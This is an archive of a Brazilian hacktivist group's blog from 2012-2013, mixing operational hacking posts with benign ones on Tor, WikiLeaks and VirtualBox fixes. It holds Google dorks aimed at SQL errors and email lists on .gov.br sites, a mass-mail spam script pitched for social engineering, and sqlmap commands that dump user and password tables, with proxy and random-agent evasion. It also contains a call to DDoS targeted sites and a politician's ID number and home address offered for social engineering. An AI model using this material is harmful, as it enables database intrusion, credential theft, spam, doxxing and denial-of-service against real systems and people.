Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

terça-feira, 19 de março de 2013

INFORMATIVO - Lacking Faces

INFORMATIVO -  Lacking Faces


A Lacking Faces é um grupo de ativismo segundo os princípios da ideia Anonymous,
de maneira que nosso papel é de divulgação desta ideia e conscientização social.
Nosso grupo não é vinculado a atividades hackers e por esta nomenclatura
não se auto-de
nomina.
Vale ressaltar, também, que,
a Lacking Faces não é responsável pelos arquivos disponibilizados
em qualquer de nossos setores.
Cada arquivo é de responsabilidade do membro que o postou.
Os temas propostos para estudos nos meios digitais dizem respeito à
segurança da informação e dos usuários.
Nenhuma das habilidades aqui aprendidas são colocadas em prática pelo grupo,
de forma que a responsabilidade é unicamente do individuo que venha a realizar.
Apartir de hoje LackingFaces apenas ira se dedicar ao ativismo e concientização da ideia Anonymous


Grupo de estudos:https://www.facebook.com/groups/GdELackingFaces/

segunda-feira, 18 de março de 2013

Doks pesquisa erros sql nos determinados domínios .gov.br . ou .org.br

Doks pesquisa erros sql nos determinados domínios .gov.br . ou  .org.br

Doks pesquisa erros sql nos determinados domínios .gov.br . ou  .org.br

Dork: site:org.br | site:gov.br & ('800a000d' | "MySQL Error") & inurl:*id*= -forum -forums -xoops -portal -tutorial

sexta-feira, 15 de março de 2013

Script PHP-DB=MYSQL Envio de e-mail em massa.

Script PHP-DB=MYSQL Envio de e-mail em massa.

Script PHP-DB=MYSQL Envio de e-mail em massa.


Script spammer para envio em massa, diferenciado pois vai dar uma grande consistência na sua engenharia social
Vinculado com banco de dados Mysql suas msg chegaram de forma dinâmica
Com os seguinte dados
---------------------------------------
nome,email,cargo,end,data
---------------------------------------
ONDE ne sua engenharia html ficara da seguinte forma com os parâmetros.
Nome do cliente: NOME_ENG

Email do
cliente: EMAIL_ENG

Cargo do
cliente: CARGO_ENG
Data do envio que você determinou no campo banco: DATA_ENG


Esses dados serão filtrados e trocados pelos os do banco de dados.
A function MAIL(); deve esta devidamente configurada.

Na function conectart() é definido os dados de acesso do BD.
Configuração de envio.
$GLOBALS['assunto'] = "O assunto usado!";
$GLOBALS['email_remetente'] =  "Remetendete.com.br";
$GLOBALS['eng_arq'] = "seuarquivo.html";

Exemplo de arqvui

Nome do cliente: NOME_ENG

Email do cliente: EMAIL_ENG

Cargo do cliente: CARGO_ENG

Data do envio que você determinou no campo banco: DATA_ENG


Modo de uso

php script.php








quinta-feira, 14 de março de 2013

Introdução Grupo de estudos Lacking Faces

A proposta da Lacking Faces é a de promover ações para um mundo melhor, dentro dos princípios da ideia Anonymous, sendo assim, oferece vários ambientes virtuais para que seus membros compartilhem informações e desenvolvam seus conhecimentos para que possam realizar seu ativismo com seriedade e eficiência.
Nesta página estão todas as informações necessárias para que os membros (ou futuros membros da Lacking Faces compreendam a rotina do grupo de estudos, suas regras e seus princípios. Além disso, é possível também a todos terem acesso aos diferentes setores da Lacking Faces.
Por fim, é de grande importância que todos tenham ciência do que consta nos links apontados abaixo, para zelar pela qualidade dos trabalhos e da aprendizagem de todos.
Contem com nossa equipe de moderadores, e vamos juntos lutar por um mundo mais justo.
Viva Anonymous.
Viva Lacking Faces.
Somos uma legião.
Link de acesso: http://lackingfaces.net/introducao/

sábado, 9 de março de 2013

Personalizando comandos SQLMAP e Analise de código PHP


Personalizando comandos SQLMAP e Analise de código PHP


Personalizando comandos SQLMAP e Analise de código PHP

SQLMAP é a uma ótima ferramenta de injeção SQL que eu já vi: feito em python, Opensource, e os comandos vão de acordo com a necessidade do invasor.
 Vamos intender como funciona á URL

 URL: https://www.siteteste.com.br/index.php?id=1 
https :[Protocolo usado]
 www.siteteste.com.br :[Domínio alvo]
 index.php :[Arquivo php onde tem os include que fazem a consulta]
 ?id :[Parâmetro GET que recebe valores para que assim faça uma consulta no BD ou validação.]
1 :[Valor que será passado]
Código:

index.php?id=1
 -------------------------------INDEX.PHP-------------------------

  1. if($_GET['id']){
  2. $id = $_GET['id']; // Capturando valor GET e inserindo na variavel $id;

  3. require_once('include/function.php'); // Inserindo arquivo function no código atual.

  4. }?>

  5. Teste SQLMAP
  • pesquisa("noticias",$id);
  • ------------------------------------------------------------------------
    Agora vamos entender como funciona o arquivo function.php

    ----------------------------FUNCTION.PHP-------------------------

    1. function pesquisa($tabela,$id){ //Noma da function

    2. $con = mysql_connect("localhost","root","123456"); // editar host, usuario, senha

    3. $sql = "SELECT * FROM web.{$tabela} WHERE id={$id}"; //concatenando valores, web é o banco de dados.

    4. $query = mysql_query($sql); //executando select

    5. if (!$query) {  die ('ERRO!:' . mysql_error()); }//Se der algo errado.

    6. while($escrever=mysql_fetch_array($query)){ //Agora vamos percorrer o array.

    7.     echo "$escrever['NOTICIA']
      ";
    8. //Imprimindo valor atual do campo noticia

    9. }

    10.  mysql_close($con); // Fechando conexão!
    11. ?>

    ----------------------------------------------------------------------------
    Codigo vulneravel pois em nem um momento é feito o filtro adequado do parâmetroID assim possibilitando a modificação do sql de busca. 
    Digamos se na get_['id'] o usuario inserir o seguinte valorindex.phpid?=-1 order by 50; 
    Se a tabela noticias tiver menos que se 50 colunas ele vai retorno falando que não existe 50 colunas.Assim vai, o Sqlmap faz todo trabalho de injeção identificando quantidade de colunas, a versão do banco.Se as senhas estiverem em md5 o sqlmap já tem um wordlist.


    Dentro do codigo ficaria assim.
    $sql = "SELECT * FROM web.{$tabela} WHERE id={$id}";
    Valor modificado "SELECT * FROM web.noticias WHERE id=-1 order by 50;"

    Agora vamos para o sqlmap

    ./sqlmap.py --url https://www.siteteste.com.br/index.php?id=1 --dbs -p id -v 3 --proxy="http://localhost:8118"

    Não explicarei comandos sqlmap favor pesquisar.

    Pelo código criado o site esta vulnerável e retorna os seguintes valores.Banco de dados:

    [ * ] web
    [ * ] information_schema

    Agora queremos saber quais as tabelas do banco de dados "web".

     ./sqlmap.py --url https://www.siteteste.com.br/index.php?id=1 -D web -p id -v 3 --proxy="http://localhost:8118" --tablesTabelas:
    [ * ] usuario
    [ * ] noticias
    [ * ] smtp
    [ * ] blog


    Neste momento precisamos saber quais as colunas da tabela usuario.

    ./sqlmap.py --url https://www.siteteste.com.br/index.php?id=1 -D web -p id -v 3 --proxy="http://localhost:8118" -T usuario --columns

    +--------+--------------+
    | Column | Type |
    +--------+--------------+
    | ID | int(11) |
    | login | varchar(255) |
    | senha | varchar(255) |
    +--------+--------------+

    Logico que queres saber os usuario e senhas do site.

    ./sqlmap.py --url https://www.siteteste.com.br/index.php?id=1 -D web -p id -v 3 --proxy="http://localhost:8118" -T usuario -C "ID,login,senha" --dump


    Vamos lá galera estudar não basta saber os comandos.Tem que é o funcionamento.

    Grupo de Estudos Lacking Face &Anonymous Brasil.

    sexta-feira, 8 de março de 2013

    Dork busca email

    Dork  email .governo

    Dork  email .governo


    Dorkeiros de plantão que adoram list emails...
    Dorks para emails-list relacionado ao governo brasileiro.

    intext:@camara.leg.br ext:txt

    intext:@*.leg.br or intext:@*.gov.br ext:txt

    Alterando o formato ext: outros formatos.
    Exemplo de uso:ext:log ou ext:sql ou ext:ini

    Pacote de estudos INURL!


    Para fanáticos em DORKS!

    Para fanáticos em DORKS!

    INTRODUÇÃO Usando o Google para se defender de ataques:

    http://blog.inurl.com.br/2011/01/google-use-melhor-seu-tempo-nas.html

    Google Use melhor seu tempo nas pesquisas:

    http://blog.inurl.com.br/2011/01/introducao-usando-o-google-para-se.html

    Mundo INURL Conceito,Principais operadores,Pesquisa MD5,Pesquisa de arquivos:

    http://blog.inurl.com.br/search/label/Mundo%20INURL%20Conceito

    Google operadores guide:

    http://blog.inurl.com.br/2010/08/google-operadores-guide.html#_

    LF DORK SCANNER 1.0

    https://www.facebook.com/groups/GdELackingFaces/579968352015846


    Grupo de Estudos Lacking Face &Anonymous Brasil
    Acesse:https://www.facebook.com/groups/GdELackingFaces/

    quinta-feira, 7 de março de 2013

    #OPprojetodestruiçãopedofiliazero Querem testar seus conhecimentos com DDOS,PENTEST,ENG SOCIAL.

    Querem testar seus conhecimentos com DDOS,PENTEST,ENG SOCIAL. Vamos fazer isso em alvos certos contra sites que propagam pedofilia pela internet. Conheça o PROJETO DESTRUIÇÃO um braço da Lacking faces contra essa mal que assombra crianças em todo mundo.  #OPprojetodestruiçãopedofiliazero


     PROJETO DESTRUIÇÃO


    Querem testar seus conhecimentos com DDOS,PENTEST,ENG SOCIAL.
    Vamos fazer isso em alvos certos contra sites que propagam pedofilia pela internet.
    Conheça o PROJETO DESTRUIÇÃO um braço da Lacking faces contra essa mal que assombra crianças em todo mundo.

    #OPprojetodestruiçãopedofiliazero

    No dia 08 de março de 2013 , as 19:00 Horário de Brasília venha juntar-se a Nós, Vamos acabar com esses porcos que acabam com a inocência de crianças, e que publicam e comercializam vídeos e fotos.
    Esta OP faz parte de um projeto contra a pedofilia, (https://www.facebook.com/groups/projetodestruicaolackingfaces/).
    Peço que todos divulguem aos quatro ventos, para atacarmos estes porcos, vamos atacar com todas as forças, desde DDos, até mesmo exposed e denuncias dos ADM’S destes sites.
    Iremos atacar massivamente estes sites vergonhosos, usando de todas as informações e ferramentas possíveis.
    A exposição dos nomes destes sites informados pelos usuários serão para fazer dentro da OP apenas no dia dos ataques.
    Criaremos pânico entre esses porcos, pois saibam que eles comunicam-se entre eles.
    EVENTO:
    https://www.facebook.com/events/122762874572946/

    quarta-feira, 6 de março de 2013

    Index of / Wireshark 6 pdf tutoriais.

    Navegando pelas dorks da vida encontrei esse index of que pode ajudar muitos do grupo que querem conhecer a ferramenta Wireshark
    Navegando pelas dorks da vida encontrei esse index of que pode ajudar muitos do grupo que querem conhecer a ferramenta Wireshark
    Index of /
    http://www.eee.ufg.br/~cgalvao/redes/lab/EEEC -
    Escola de Engenharia Elétrica e de Computação - UFG
    EMAIL.pdf 29-Nov-2012 23:59 101K
    Wireshark_IP.pdf 17-Jan-2013 23:53 253K
    Wireshark_TCP.pdf 17-Jan-2013 16:29 360K
    Wireshark_UDP.pdf 17-Jan-2013 23:46 42K
    tutorial-wireshark.pdf 20-Nov-2012 20:19 716K
    wireshark-dns.pdf 20-Nov-2012 20:22 345K
    wireshark-http.pdf 20-Nov-2012 20:22 200K

    Grupo de Estudos Lacking Face &Anonymous Brasil

    Documentos para estudo FTP publico registro.br


    Documentos para estudo FTP publico registro.br


    Conferencias web
    ftp://ftp.registro.br/pub/
    ftp://ftp.registro.br/pub/w3c/
    ftp://ftp.registro.br/pub/w3c/wwwbrasil2009/
    ftp://ftp.registro.br/pub/w3c/Conferencia_Web_10-2010/
    ftp://ftp.registro.br/pub/forumdainternet/


    Inúmeros PDF de treinamento voltados para TI - SEC.
     ftp://ftp.registro.br/pub/gts/

    Agora só garimpar e baixar.
    Usuários Linux já sabem que um wget é uma boa escolha.

    Fonte:
    Grupo de Estudos Lacking Face &Anonymous Brasil 
     https://www.facebook.com/groups/GdELackingFaces/doc/580825741930107/

    domingo, 3 de março de 2013

    LF DORK SCANNER 1.0 - Motor de busca: UOL - personalizada do google, feito em perl


    LF DORK SCANNER 1.0 - Motor de busca: UOL - personalizada do google, feito em perl
    LF DORK SCANNER 1.0

    Motor de busca: UOL - personalizada do google.
    Parâmetros de pesquisa: Dorks.
    Feito em perl.
    Exemplo de uso: inurl:php?id= noticias site:br

    # LackingFaces { http://lackingfaces.net/ }
    # Escaner de SQLI para fins educacionais,
    # Não nos responsabilizamos pelo mau uso do mesmo.

    quinta-feira, 28 de fevereiro de 2013

    LackingWeb Pequeno webbrowser feito em c# Programa + Fonte

    LackingWeb Pequeno webbrowser feito em c# Programa + Fonte

    Navegador web simples feito em C#
    Campos: combo com motores de busca para escolher
    Textbox para pesquisa botão de pesquisa e de controle.

    Fonte:Grupo de Estudos Lacking Face &Anonymous Brasil.

    Grupo livre pra todos que querem aprender!
    Nossa única exigência é que se sinta bem!
    Nosso alvo é espalhar conhecimento, pra juntos, podermos lutar contra injustiças em geral! Unidos como um, divididos por zero!
    Somos muitos!

    LackingMysql Consulta em BD Mysql programa + fonte

    LackingMysql Consulta em BD Mysql programa + fonte

    Feito em C#


    Conecta em bancos de dados mysql.
    Campos, Servidor,Login,Senha,SQL

    Feito para estudantes de programação C#

    Necessita: Microsoft .NET Framework 4


    Link Download:https://www.facebook.com/groups/GdELackingFaces/577583682254313/

    Créditos Grupo de Estudos Lacking Face e Anonymous Brasil

    Grupo livre pra todos que querem aprender!
    Nossa única exigência é que se sinta bem!
    Nosso alvo é espalhar conhecimento, pra juntos, podermos lutar contra injustiças em geral! Unidos como um, divididos por zero!
    Somos muitos!

    sexta-feira, 15 de fevereiro de 2013

    Dorks buscar sites do governo brasileiro com erros sql.

    Dorks buscar sites do governo brasileiro com erros sql.

    Dork: site:gov.br & intext:"SQL syntax" & +inurl:php?= +(id) -pdf -forum -softwarepublico -ppt -ftp -intext:"SQL injection"

    Explicativo:

    site:gov.br = restringir nossa busca somente no domínio gov.br, mas tambem pode ser usado para outros domínios.
    & =  Operador logico.
    intext:"SQL syntax" =  Procurar no texto interno da pagina o conjunto de palavras "SQL syntax".
    +inurl:php?=  = "+" força o motor de busca pesquisa a determinada palavra ou operador, inurl:palavra = pesquisar na URL da pagina.
     - = Retira da pesquisa assim facilita o filtro.
     
     

    quarta-feira, 2 de janeiro de 2013

    Solucionando “Erro: Kernel driver not installed (rc=-1908)” do Virtualbox 3.2.4 no Ubuntu

    Solucionando “Erro: Kernel driver not installed (rc=-1908)” do Virtualbox 3.2.4 no Ubuntu

    Recentemente trabalhando com minhas máquinas virtuais no Virtualbox 3.2.4, da Sun/Oracle, me deparei com a seguinte mensagem de erro abaixo ao tentar executar qualquer uma máquina virtual:
    Imagem Erro: Kernel driver not installed (rc=-1908)
    Após algumas varreduras no Oráculo (Google), cheguei a seguinte solução quer compartilho com vocês:
    1º Passo:
    Verificar através do comando “cat /etc/group” se o seu usuário pertence ao grupo de usuários vboxusers. Caso não, execute o comando abaixo:
    sudo addgroup usuário vboxusers
    2º Passo:
    Executar o comando da mensagem de erro como usuário root.

    sudo /etc/init.d/vboxdrv setup
    3º Passo:
    Da permissão de leitura, escrita e execução ao o usuário root e ao grupo de usuários da pasta /dev/vboxdrv

    sudo chmod 770 /dev/vboxdrv
    Pronto! Agora você já pode voltar a brincar com as suas máquinas virtuais. ;) 

    Fonte:http://phpimenta.wordpress.com/2010/06/20/corrigindo-erro-kernel-driver-not-installed-rc-1908-do-virtualbox-3-2-4-no-ubuntu-10-04/


    Se nada disso der certo.
    Tente esses

    1 -

    sudo dkms install virtualbox/4.1.2
    
    
    2-Tentar instalar leitor de cabeçalhos linux:
    sudo apt-get install linux-headers-$(uname -r)

    sábado, 29 de dezembro de 2012

    O Braço do Wikileak no Brasil.

    WikiLeaks foi fundado para disseminar documentos, fotos e vídeos que têm significado político ou social. Web: http://wikileaks.org/wiki/Category:Brazil
    Missão
    WikiLeaks, publicados por Sunshine Press, é uma organização sem fins lucrativos financiada por defensores dos direitos humanos, jornalistas investigativos, tecnólogos eo público em geral.
    Através de seu apoio que temos exposto injustiça significativa em todo o mundo combatendo-off com sucesso mais de 100 ataques legais no processo. Nosso trabalho produz reformas diariamente e é o destinatário de vários prêmios, incluindo o Índice de 2008 sobre censura Economista-Liberdade de Expressão Award, bem como a Anistia Internacional 2009 New Media Award. Nós não aceitamos governo ou financiamento corporativo. Nós nunca ter comprometido uma fonte.
    Informações gerais
    WikiLeaks foi fundado para disseminar documentos, fotos e vídeos que têm significado político ou social. Web: http://wikileaks.org/wiki/Category:Brazil WikiLeaks - Abrir os governos.
    Descrição
    Página oficial do Facebook. WikiLeaks foi fundado por Sunshine Press para disseminar documentos, fotos e vídeos secretos que têm significado político ou social. Web: http://wikileaks.org/wiki/Category:Brazil

    Informações de contato

    domingo, 23 de dezembro de 2012

    Momento Wikipédia! O que é TOR?

    Momento Wikipédia!  O que é TOR?


    Momento Wikipédia!
    O que é TOR?

    The Onion Router, também conhecido pela sigla Tor, é uma rede de computadores distribuída com o intuito de prover meios de comunicação anônima na Internet. A maioria das distribuições GNU/Linux disponibilizam pacotes do Tor, embora haja versões para diferentes sistemas operacionais, tais como Windows e Mac OS. A rede Tor é uma rede de túneis http (com tls) sobrejacente à Internet, onde os roteadores da rede são computadores de usuários comuns rodando um programa e com acesso web (apenas). O objetivo principal do projeto é garantir o anonimato do usuário que está acessando a web.

    Funcionamento

    O Tor-cliente é um programa que deve ser instalado no computador e que funciona como um proxy socks 5 para este. É fornecido um bind, geralmente na porta 9.050 local da máquina. Em seguida, os programas (web browser, emule etc.) devem ser configurados para usar um servidor proxy socks 5 e apontados para o endereço localhost (127.0.0.1). Às vezes, ele também possui um navegador incluído, tal como Aurora e Mozilla Firefox.

    A partir daí, o Tor vai rotear todo o tráfego do computador através de túneis http da rede Tor até o destino, na rede "convencional". Se o usuário entrar em site do tipo http://myip.is/ e http://meuip.com.br/, vai ver que o seu endereço vai aparecer diferente do seu endereço real (anonimato). O endereço que vai aparecer é o endereço do nó Tor por onde ele saiu da rede Tor para a rede "convencional". O tráfego é roteado por vários nós Tor, o que pode deixar o acesso bem lento, às vezes.

    Ou seja, para o servidor acessado você terá o endereço IP de um do nó de saída, como a rede Tor tem uma topologia caótica (aleatória), não se pode escolher o IP final ou de qual região da rede será. Por exemplo, usando a rede Tor você não pode escolher ter um IP de uma máquina localizada em um país ou região específica.

    Ainda é possível aumentar a rede, abrindo seu computador para uso de outros usuários do Tor.

    Há uma espécie de domínio com terminação .onion, acessível apenas pelo Tor. Páginas com este domínio são chamadas de Deep Web.
    Características

    Uma observação importante: o usuário deve ter cuidado se for usar a rede Tor para tráfegos não-criptografados, pois a segurança em nível de transporte que o Tor implementa é só até o nó Tor de saída (exit node). Desse ponto até o destino da rede "convencional", o tráfego é encaminhado da maneira original como foi entregue ao Tor na máquina local. Então, se o usuário configurar o seu Tor para operar como servidor de relay, terá a possibilidade de logar o tráfego original de todas as pessoas que estiverem passando por túneis cujo nó de saída seja o seu nó Tor.

    Tor é um pacote de ferramentas para organizações e pessoas que desejam mais segurança na Internet. Com ele, o tráfego de dados na navegação de mensageiros instantâneos, IRC, navegadores, SSH e outros aplicativos que usam o protocolo TCP se tornará anônimo. Ele também fornece uma plataforma na qual os desenvolvedores podem construir novos aplicativos baseados no anonimato, segurança e privacidade. O tráfego é mais seguro ao se usar Tor, pois as comunicações são ligadas através de uma rede distribuída de servidores, chamados roteadores onion (onion router), um projeto que visa à proteção e ao direito do usuário de permanecer anônimo na Internet.

    Ao invés de direcionar a rota da fonte para o destino, os pacotes de dados da rede Tor assumem um caminho aleatório através de vários servidores que cobrem os traços para que nenhum observador inoportuno saiba de onde vieram e para onde vão os dados. O propósito dessa tecnologia é proteger os usuários da Internet contra a "análise de tráfego", uma forma de monitoramento de rede que ameaça o anonimato e a privacidade, atividades comerciais confidenciais e relacionamentos, além da segurança de Estado.

    A análise de tráfego é usada diariamente por corporações, governos e indivíduos que desejam manter um banco de dados do que fazem pessoas e organizações na Internet. Ao invés de procurar o teor das comunicações, a análise de tráfego rastreia de onde vêm e para onde vão os seus dados, assim como quando foram enviados e a quantidade.

    Por exemplo, companhias usam a análise de tráfego para armazenar um registro de que páginas da Internet o usuário visitou para construir um perfil dos seus interesses. Suponha-se que uma indústria farmacêutica use essa análise ao pesquisar um nicho de mercado, monitorando o website do concorrente para saber quais produtos lhe interessam. Uma lista de patentes pode ser consultada, rastreando todas as buscas feitas.

    Tor dificulta a análise de tráfego ao evitar o rastreamento de dados online, permitindo que o usuário decida se deseja se identificar ou não ao se comunicar. A segurança é aperfeiçoada enquanto mais pessoas se voluntariam a executar servidores. Parte do objetivo do projeto Tor é fazer um experimento com o público, ensinando as melhores saídas para obter privacidade online.
    Opera Tor

    Opera Tor é um programa de computador que combina o programa de anonimidade Tor com o navegador Opera e deve ser executado diretamente de uma mídia portátil, como um pen drive.

    Por ser executável diretamente de uma mídia portátil, Opera Tor não precisa nem mesmo ser instalado no computador, de tal forma que seu uso não altera em nada na configuração do sistema, dos outros navegadores ou arquivos. Programas baseados em Tor tem sido usado por internautas de países submetidos a ditaduras para burlar a censura do governo, uma vez que o IP do internauta é totalmente mascarado. Sendo assim, as páginas visitadas não poderão reter informação do internauta. Apenas o provedor do usuário terá acesso aos dados e detalhes da navegação.

    No âmbito do estudo da Segurança da Informação pode-se questionar, porém, se governos e desenvolvedores não teriam acesso aos dados navegados, mas até hoje não houve nenhuma evidência neste sentido. De qualquer forma, esta tem sido uma ferramenta para internautas de diversos países acessarem a internet sem censura e jornalistas divulgarem notícias desagradáveis a governos em Estados ditatoriais, sendo uma verdadeira arma de informação a favor da democracia.

    Mundo INURL Conceito,Principais operadores,Pesquisa MD5,Pesquisa de arquivos

    Mundo INURL Conceito,Principais operadores,Pesquisa MD5,Pesquisa de arquivos


    *Conceito INURL.
    *Principais operadores.
    *Pesquisa MD5 e outras criptografia.
    *Pesquisa de arquivos determinando o arquivo seja PDF ou TXT "fica de sua preferência a extensão".


    *Conceito INURL:

    Algumas dicas que servem para a maioria dos buscadores, incluindo o Google,
    È usar apenas palavras chaves na sua busca, em vez de buscar, por exemplo, Golpe do Estado busque
    Por Golpe Estado. O Google e alguns poucos outros tem uma melhor vantagem, ele faz um filtro de busca,
    Retirando informações pequenas, como de, da/do, com, dessa forma não é totalmente necessário fazer o filtro
    Manualmente, porém a pesquisa pode se tornar um pouco mais rápida.
    "Ou seja para fazer uma pesquisa não precisa digitar uma pergunta na barra de pesquisa."

    Exemplo
    "Seu intuito é encontrar um sites com musicas da banda Metallica"

    - ERRO: baixar musicas da banda Metallica: De fato vem sites com o conteúdo citado porem vem um resultado meio sujo.

    "Devemos usar o poder das palavras chaves"

    - Certo: musicas Metallica mp3 ou somente Metallica mp3: O resultado fica um pouco mais limpo pois vai direto para blogs
    referente downloads.

    *2 - Reforçando a pesquisa utilize: Aspas duplas, digamos queres achar uma pessoa pelo nome
    Dados que você tem Nome: zé dirceu

    Somente isso,como inicia pesquisar no Google "ZÉ DIRCEU" o resultado não mudou muito,com aspas.
    Agora vamos ser um pouco mais inteligentes é usar em vez de zé vamos usar "JOSÉ DIRCEU",
    Pois zé e abreviação de zé digamos assim.
    Vão falar nossa não mudou muito, lembra que eu falei dos poderes de uma palavra chave vamos combinar
    "JOSÉ DIRCEU" com algo comum de qualquer brasileiro

    pesquisa: "JOSÉ DIRCEU" +cpf
    +cpf = Obriga o o google a pesquisa a palavra CPF junto com termo "JOSÉ DIRCEU",
    assim tú garante que o Google inclua CPF na pesquisa
    Resultado:
    JOSÉ DIRCEU DE OLIVEIRA E SILVA, brasileiro, casado, advogado, CI
    n.º 3.358.423 SSP/SP, nascido em 16/03/1946, filho de Castorino de
    Oliveira e Silva e Olga Guedes da Silva, residente na SQS 311, Bloco I,
    apto. 302, Brasília/DF;

    "Com isso já é possível gerar uma engenharia social mais isso em outro documento."

    --------------------------------------------------------------------------------------------------------------------------------------

    *Principais operadores.

    // "ASPAS"
    Pesquisar uma palavra ou frase exata: "consulta de pesquisa" Use aspas.
    ex:[ "olha que coisa mais linda" ]


    // -EXCLUIR
    Excluir uma palavra -pesquisa: Adicione um hífen (-) antes da palavra para excluir.
    ex:[ pandas -site:wikipedia.org ]   2 [ velocidade jaguar -carro ]     

    Incluir palavras similares: ~consulta Normalmente, algumas palavras da consulta original poderão
    ser substituídas por sinônimos. Adicione um til (~)
    ex:[ fatos ~alimentares ] inclui resultados para "fatos nutricionais"


    // SITE:gov.br
    Pesquisar em um site ou domínio: site: consulta Inclua "site:" para procurar informações em um único website.
    ex:[ poupa tempo site:sp.gov.br ]    

    // "CORINGA*BATIMAN"
    "Preencher" os espaços: consulta * consulta Use um asterisco (*) dentro da consulta como espaço
    reservado para termos desconhecidos ou "curinga".
    ex:[ "quem tem * vai a Roma" ]          

    // OR
    Pesquisar por uma das palavras consulta OR consulta: Para pesquisar por páginas que contenham apenas uma palavra
    entre várias palavras, inclua OR.
    ex:[ sede olimpíadas 2014 OR 2018 ] 2 [ "copa do mundo 2014" OR "olimpíadas 2014" ]  

    // ..INTERVALO
    Pesquise por um intervalo numérico número..número:Separe os números por dois pontos (sem espaços) para ver
    resultados dentro do intervalo especificado de datas.
    ex:[ câmera $50..$100 ] 2 [ vencedores copa do mundo ..2000 ]  

    // FILETYPE OU EXT
    Pesquisa por arquivos determinando a extensão ext: ou filetype: Exemplo, apostilas ext:pdf ou filetype:pdf,
    "introdução mysql" ext:pdf


    // INTEXT:
    Pesquisa de texto especifico intext:"Machado de Assis".

    //INTITLE:
    Termo do html Machado de Assis livros do valor X ou Y
    Pesquisa por texto especifico no title de sites intitle:"Machado de Assis livros"



    Esses são os comandos básicos para sobrevivência em pesquisa.
    --------------------------------------------------------------------------------------------------------------------------------------

    *Pesquisa MD5 e outras criptografia.
    Muito simples: "ff9830c42660c1dd1942844f8069b74a"
    link: https://www.google.com.br/search?q="ff9830c42660c1dd1942844f8069b74a"
    Pequisar site que são relacionados ao assunto md5 ou criptografia:

    pesquise pelo termo:decrypt md5

    *Pesquisa de arquivos determinando o arquivo seja PDF ou TXT "fica de sua preferência a extensão".
    Vamos pesquisa apostilas

    "Determinar o assunto depois a extenção" ext:pdf

    "cpf" ext:pdf
    ou
    "cpf" filetype:pdf

    Agora vamos combinar com o operador site: que vai determinar o site o domínio especifico da pesquisa.

    site:gov.br "cpf" ext:pdf
    ou
    site:gov.br "cpf" filetype:pdf

    Vamos restringir mais pois gov.br sera referente a muito subdomínios vamos nos focar governo de São Paulo.

    site:sp.gov.br "cpf" ext:pdf
    ou
    site:sp.gov.br "cpf" filetype:pdf

    Mundando foco da pesquisa busca de apostilas para estudos.
    "Vamos tirar o termo site pois queremos pegar apostilas independente do domínio."

    "Introdução php" ext:pdf
    ou
    "Introdução php" filetype:pdf

    Mudando a palavra php para MYSQL ou C#,PERL sua pesquisa fica dinâmica.


    A pesquisa é isso um pouco de operador é um pouco de necessidade.

    By:Cleiton Pinheiro

    Referencias:
    http://www.google.com/intl/pt-br/insidesearch/tipstricks/something-to-do.html
    http://blog.inurl.com.br/2011/01/o-que-e-string.html

    sexta-feira, 21 de dezembro de 2012

    COMANDOS - SQLMAP Injetando via POST.

    sqlmap de uma forma diferente

    COMANDOS   -   SQLMAP Injetando via POST.


    COMANDOS   -   SQLMAP Injetando via POST.

    sqlmap.py --url *************** --current-db
    sqlmap.py --url *************** -D 'databasedosite' --tables
    sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite' --columns sqlmap.py --url *************** -D 'databasedosite' -T 'tabeladosite" -C 'colunasdosite' --dump


    ANALISANDO DADOS PARA O ATAQUE VIA POST

    Vamos ao agora enviar via post.
    Exemplo uma tela de login e senha!, como injetar com sqlmap ??
    alvo:http://www.pagina.com.br/login.phpUrl para onde é enviado os posts usuario e senha, como saber qual url. 
    Abra o codigo fonte e veja analise o fonte


    <form  action="validar/lt.php" method="post"  >
    <input type="text" name="login">
    <input type="text" name="senha">
    </form>

    No caso para onde é enviado os posts "campos login e senha".

    sqlmap.py --url http://www.pagina.com.br/validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs
    #2* e #1* Indica que são campos posts e os mesmo devem ser injetados


    DEIXANDO SEU AGENT HTTP RANDÔMICO
    Vamos incrementar o comandos no teste.--ramdon-agent ou seja ele vai ramdomizar seu Agent http://en.wikipedia.org/wiki/User_agentEX:
    Mozilla/5.0 (iPad; U; CPU OS 3_2_1 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Mobile/7B405
    A cada requisição ele vai mudar seu user agent:
    sqlmap.py --url http://www.pagina.com.br/validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs --random-agent


    SETANDO PROXY
    Para ficar não ficar exposto utilizer o parâmetro proxy sempre.--proxy="SEU PROXY:PORTA"
    ex:
    sqlmap.py --url http://www.pagina.com.br/validar/ls.php --data "login=admin#2*&senha=123#1*" --dbs --random-agent --proxy="SEU PROXY:PORTA"

    MODELO 2 DE INJETAR SQL VIA POST
    Agora vamos utilizar a segunda forma de injetar via post.Lendo um arquivo de requisição post via sqlmap, com o comando "-r"Precisamos criar arquivo com o nome fica sua escolha configurado devidamente.Ex:

      POST http://www.pagina.com.br/validar/ls.php HTTP/1.1
      Host: www.pagina.com.br
      Origin: http://www.pagina.com.br/
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.54.16 (KHTML, like Gecko) Version/5.1.4 Safari/534.54.16
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOMD4054CXIAin1BB
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Referer:  http://www.pagina.com.br/login.php
      Accept-Language: en-us
      Accept-Encoding: gzip, deflate
      Cookie: PHPSESSID=ea4b4f69b0ed5e611b0d1b5ff5c7e9f9;
      Pragma: no-cache
      Connection: keep-alive
      Proxy-Connection: keep-alive
      Content-Length: 468

      ------WebKitFormBoundaryOMD4054CXIAin1BB
      Content-Disposition: form-data; name="login#1*"

      admin
      ------WebKitFormBoundaryMDad4054CXIAin1BB
      Content-Disposition: form-data; name="senha#1*"

      1234

    depois de salvar o conteúdo acima no arquivo post.txt,Vamos executalo
    ../sqlmap.py -r post.txt --dbs --random-agent --proxy="SEU PROXY:PORTA"


    "Conhecimento livre & Com responsabilidade"

    quinta-feira, 20 de dezembro de 2012

    Momento Wikipédia! O QUE É UM EXPLOIT ?????

    O QUE É UM EXPLOIT ?????
    Momento Wikipédia!
    O QUE É UM EXPLOIT ?????

